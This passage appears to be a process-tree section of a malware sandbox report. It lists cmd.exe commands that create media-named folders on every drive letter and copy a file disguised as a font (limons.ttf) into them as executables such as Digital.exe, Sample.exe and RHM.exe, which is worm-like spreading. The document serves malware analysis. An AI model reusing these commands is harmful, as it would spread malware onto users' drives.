- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Video
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Mp3
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Mp3
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Mp3
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Mp3
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Mp3
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Mp3
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Mp3
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Mp3
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Mp3
    3⤵
    PID:764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Mp3
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Mp3
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Mp3
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Mp3
    3⤵
    PID:896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Mp3
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Mp3
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Mp3
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Mp3
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Mp3
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Mp3
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Mp3
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Mp3
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Mp3
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Mp3
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Mp3
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Music
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Music
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Music
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Music
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Music
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Music
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Music
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Music
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Music
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Music
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Music
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Music
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Music
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Music
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Music
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Music
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Music
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Music
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Music
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Music
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Music
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Music
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Music
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Music
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Videos
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Videos
    3⤵
    PID:2664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Videos
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Videos
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Videos
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Videos
    3⤵
    PID:804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Videos
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Videos
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Videos
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Videos
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Videos
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Videos
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Videos
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Videos
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Videos
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Videos
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Videos
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Videos
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Videos
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Videos
    3⤵
    PID:340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Videos
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Videos
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Videos
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Videos
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Images
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Images
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Images
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Images
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Images
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Images
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Images
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Images
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Images
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Images
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Images
    3⤵
    PID:328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Images
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Images
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Images
    3⤵
    PID:916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Images
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Images
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Images
    3⤵
    PID:780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Images
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Images
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Images
    3⤵
    PID:580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Images
    3⤵
    PID:320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Images
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Images
    3⤵
    PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Images
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Movies
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Movies
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Movies
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Movies
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Movies
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Movies
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Movies
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Movies
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Movies
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Movies
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Movies
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Movies
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Movies
    3⤵
    PID:376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Movies
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Movies
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Movies
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Movies
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Movies
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Movies
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Movies
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Movies
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Movies
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Movies
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Movies
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Sounds\Digital.exe /y
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Sounds\Digital.exe /y
    3⤵
    PID:108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Sounds\Digital.exe /y
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Sounds\Digital.exe /y
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Sounds\Digital.exe /y
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Sounds\Digital.exe /y
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Sounds\Digital.exe /y
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Sounds\Digital.exe /y
    3⤵
    PID:636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Sounds\Digital.exe /y
    3⤵
    PID:988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Sounds\Digital.exe /y
    3⤵
    PID:876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Sounds\Digital.exe /y
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Sounds\Digital.exe /y
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Sounds\Digital.exe /y
    3⤵
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Sounds\Digital.exe /y
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Sounds\Digital.exe /y
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Sounds\Digital.exe /y
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Sounds\Digital.exe /y
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Sounds\Digital.exe /y
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Sounds\Digital.exe /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Sounds\Digital.exe /y
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Sounds\Digital.exe /y
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Sounds\Digital.exe /y
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Sounds\Digital.exe /y
    3⤵
    PID:880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Sounds\Digital.exe /y
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Sounds\Sample.exe /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Sounds\Sample.exe /y
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Sounds\Sample.exe /y
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Sounds\Sample.exe /y
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Sounds\Sample.exe /y
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Sounds\Sample.exe /y
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Sounds\Sample.exe /y
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Sounds\Sample.exe /y
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Sounds\Sample.exe /y
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Sounds\Sample.exe /y
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Sounds\Sample.exe /y
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Sounds\Sample.exe /y
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Sounds\Sample.exe /y
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Sounds\Sample.exe /y
    3⤵
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Sounds\Sample.exe /y
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Sounds\Sample.exe /y
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Sounds\Sample.exe /y
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Sounds\Sample.exe /y
    3⤵
    PID:788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Sounds\Sample.exe /y
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Sounds\Sample.exe /y
    3⤵
    PID:560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Sounds\Sample.exe /y
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Sounds\Sample.exe /y
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Sounds\Sample.exe /y
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Sounds\Sample.exe /y
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Music\RHM.exe /y
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Music\RHM.exe /y
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Music\RHM.exe /y
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Music\RHM.exe /y
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Music\RHM.exe /y
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Music\RHM.exe /y
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Music\RHM.exe /y
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Music\RHM.exe /y
    3⤵
    PID:896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Music\RHM.exe /y
    3⤵
    PID:888
